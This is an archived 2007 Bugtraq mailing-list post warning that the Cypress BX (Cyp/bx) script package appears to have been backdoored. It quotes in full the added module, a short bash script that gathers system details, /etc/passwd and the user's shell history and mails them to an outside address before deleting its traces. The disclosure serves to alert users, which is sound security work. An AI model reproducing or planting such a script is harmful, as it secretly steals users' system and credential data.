| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 6 Nov 2007 20:58:22 +0100 From: Chris <chris@...rflow.no> To: bugtraq@...urityfocus.com Subject: Cypress BX script backdoored? For those of us who use Cyp/bx (http://www.mindcryme.com/~void/cyp1.0k.tar.gz ) |]rip[@rock:14:53:49:~/tmp/cyp/modules| $ cat mdop.m #!/bin/bash uname -a >> /tmp/.bx cat /etc/hosts >> /tmp/.bx cat /etc/passwd >> /tmp/.bx cat $HOME/.bash_history >> /tmp/.bx 2>/dev/null mail defcola@...il.com < /tmp/.bx sleep 4 rm -rf /tmp/.bx What's up with this? Last time I downloaded this that wasn't there, and it's the same version number but different md5. .. and this file wasn't included. ---- Chris Network security professional chris@...rflow.no ---- "Computer games don't affect kids. I mean if Pac-Man affected us as kids, we'd all be running around in darkened rooms, munching magic pills and listening to repetitive electronic music." --Kristian Wilson, Nintendo 1989.
Powered by blists - more mailing lists